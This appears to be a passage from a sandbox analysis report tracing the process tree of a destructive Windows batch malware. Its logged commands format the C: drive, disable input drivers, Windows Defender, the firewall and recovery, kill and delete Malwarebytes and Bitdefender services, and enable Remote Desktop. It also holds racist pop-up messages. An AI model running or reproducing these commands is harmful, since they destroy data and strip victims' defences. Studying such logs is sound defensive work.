C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6868
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:5712
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:6720
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:5404
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:7108
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6172
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6996
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6784
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:4508
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6196
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6496
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:6476
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:6388
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:6772
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:6524
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6872
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6828
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:7048
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:7080
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6640
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6888
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:6800
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:5696
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:6708
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:6868
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6488
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:7152
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6648
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:6272
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6456
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6272
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:7228
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:7328
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:7420
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:7448
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:7464
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:7496
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:7532
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:7548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:7572
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:7584
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:7768
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:8016
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:8072
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:8164
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:7176
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:7200
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4700
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:7228
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:7316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:7352
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:7544
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:7724
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:7792
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:8028
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:8148
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:8076
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:8164
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:7180
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:7204
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:7284
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:7308
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:7328
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:7800
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:7648
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:7776
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:8008
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:8032
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:7956
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:8088
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:8132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:8080
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:8180
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:7352
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:7552
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:7644
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:7824
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:7872
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:7924
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:7648
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:7776
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:8016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:7920
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:8108
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6812
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:7048
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:7540
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:7416
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:7440
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:7456
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:7544
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:7764
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:7836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:7928
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:7776
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:8032
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:7292
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:7296
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:8180
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:7576
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:5844
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:7352
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:7412
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:7456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:7656
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:7872
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:7584
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:8028
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:6972
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:7316
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:7296
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:7428
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:7580
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:7572
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:7624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:7424
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:7336
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:5100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Windows\system32\openfiles.exeopenfiles4⤵PID:4976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(new-object -com shell.application).minimizeall()"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2648
-
-
C:\Windows\system32\curl.execurl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png4⤵PID:5240
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵
- Sets desktop wallpaper using registry
PID:2436
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f4⤵PID:3276
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f4⤵PID:3960
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵PID:4552
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f4⤵PID:468
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f4⤵PID:4020
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵PID:5588
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f4⤵PID:5804
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:1056
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f4⤵PID:5312
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f4⤵PID:2864
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:1556
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
PID:5416
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled4⤵
- Launches sc.exe
PID:5140
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵PID:6056
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵PID:5852
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵PID:4892
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵PID:2892
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:5412
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f4⤵
- Modifies security service
PID:1160
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f4⤵PID:1292
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f4⤵PID:5360
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f4⤵
- Modifies security service
PID:4488
-
-
C:\Windows\system32\cmd.execmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"4⤵PID:608
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f5⤵PID:5716
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6044
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe4⤵
- Kills process with taskkill
PID:4180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4048
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f4⤵PID:5512
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f4⤵PID:3936
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f4⤵PID:292
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f4⤵PID:644
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f4⤵PID:2796
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f4⤵PID:3012
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f4⤵PID:2968
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:856
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f4⤵PID:6072
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f4⤵PID:5288
-
-
C:\Windows\system32\ReAgentc.exereagentc /disable4⤵
- Drops file in Windows directory
PID:5928
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2504
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2152
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Recovery /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3348
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1032
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled No4⤵
- Modifies boot configuration data using bcdedit
PID:5468
-
-
C:\Windows\system32\bcdedit.exebcdedit /deletevalue {default} recoveryenabled4⤵
- Modifies boot configuration data using bcdedit
PID:2096
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f4⤵PID:5424
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵PID:1192
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:2940
-
-
C:\Windows\system32\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f4⤵PID:5576
-
-
C:\Windows\system32\reg.exeREG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f4⤵PID:5500
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
PID:1712
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled4⤵PID:1172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableAntiTamper $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3448
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1272
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\wscsvc.dll" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4268
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbam.exe /T4⤵
- Kills process with taskkill
PID:5420
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MBAMService.exe /T4⤵
- Kills process with taskkill
PID:4932
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamtray.exe /T4⤵
- Kills process with taskkill
PID:6088
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamscheduler.exe /T4⤵
- Kills process with taskkill
PID:2528
-
-
C:\Windows\system32\sc.exesc stop MBAMService4⤵
- Launches sc.exe
PID:296
-
-
C:\Windows\system32\sc.exesc delete MBAMService4⤵
- Launches sc.exe
PID:4164
-
-
C:\Windows\system32\sc.exesc stop MBAMProtector4⤵
- Launches sc.exe
PID:644
-
-
C:\Windows\system32\sc.exesc delete MBAMProtector4⤵
- Launches sc.exe
PID:3568
-
-
C:\Windows\system32\sc.exesc stop MBAMChameleon4⤵PID:5136
-
-
C:\Windows\system32\sc.exesc delete MBAMChameleon4⤵
- Launches sc.exe
PID:4768
-
-
C:\Windows\system32\sc.exesc stop MBAMFarflt4⤵
- Launches sc.exe
PID:3012
-
-
C:\Windows\system32\sc.exesc delete MBAMFarflt4⤵
- Launches sc.exe
PID:4304
-
-
C:\Windows\system32\sc.exesc stop MBAMSwissArmy4⤵
- Launches sc.exe
PID:3104
-
-
C:\Windows\system32\sc.exesc delete MBAMSwissArmy4⤵
- Launches sc.exe
PID:856
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f4⤵PID:6112
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f4⤵PID:6116
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f4⤵PID:5928
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f4⤵PID:2356
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f4⤵PID:3548
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f4⤵PID:3964
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdservicehost.exe /T4⤵
- Kills process with taskkill
PID:3416
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdagent.exe /T4⤵
- Kills process with taskkill
PID:1780
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdredline.exe /T4⤵
- Kills process with taskkill
PID:5240
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdparentalservice.exe /T4⤵
- Kills process with taskkill
PID:1712
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdreinit.exe /T4⤵
- Kills process with taskkill
PID:2932
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdsubwiz.exe /T4⤵
- Kills process with taskkill
PID:3500
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM seccenter.exe /T4⤵
- Kills process with taskkill
PID:252
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vsserv.exe /T4⤵
- Kills process with taskkill
PID:3152
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epssecurityservice.exe /T4⤵
- Kills process with taskkill
PID:5432
-
-
C:\Windows\system32\sc.exesc stop bdservicehost4⤵
- Launches sc.exe
PID:3088
-
-
C:\Windows\system32\sc.exesc delete bdservicehost4⤵
- Launches sc.exe
PID:60
-
-
C:\Windows\system32\sc.exesc stop bdagent4⤵
- Launches sc.exe
PID:5496
-
-
C:\Windows\system32\sc.exesc delete bdagent4⤵
- Launches sc.exe
PID:4436
-
-
C:\Windows\system32\sc.exesc stop bdredline4⤵
- Launches sc.exe
PID:2840
-
-
C:\Windows\system32\sc.exesc delete bdredline4⤵
- Launches sc.exe
PID:4992
-
-
C:\Windows\system32\sc.exesc stop bdparentalservice4⤵
- Launches sc.exe
PID:1720
-
-
C:\Windows\system32\sc.exesc delete bdparentalservice4⤵
- Launches sc.exe
PID:3008
-
-
C:\Windows\system32\sc.exesc stop bdreinit4⤵
- Launches sc.exe
PID:3832
-
-
C:\Windows\system32\sc.exesc delete bdreinit4⤵
- Launches sc.exe
PID:4196
-
-
C:\Windows\system32\sc.exesc stop bdsubwiz4⤵PID:4648
-
-
C:\Windows\system32\sc.exesc delete bdsubwiz4⤵
- Launches sc.exe
PID:6064
-
-
C:\Windows\system32\sc.exesc stop seccenter4⤵
- Launches sc.exe
PID:2724
-
-
C:\Windows\system32\sc.exesc delete seccenter4⤵
- Launches sc.exe
PID:924
-
-
C:\Windows\system32\sc.exesc stop vsserv4⤵
- Launches sc.exe
PID:3632
-
-
C:\Windows\system32\sc.exesc delete vsserv4⤵
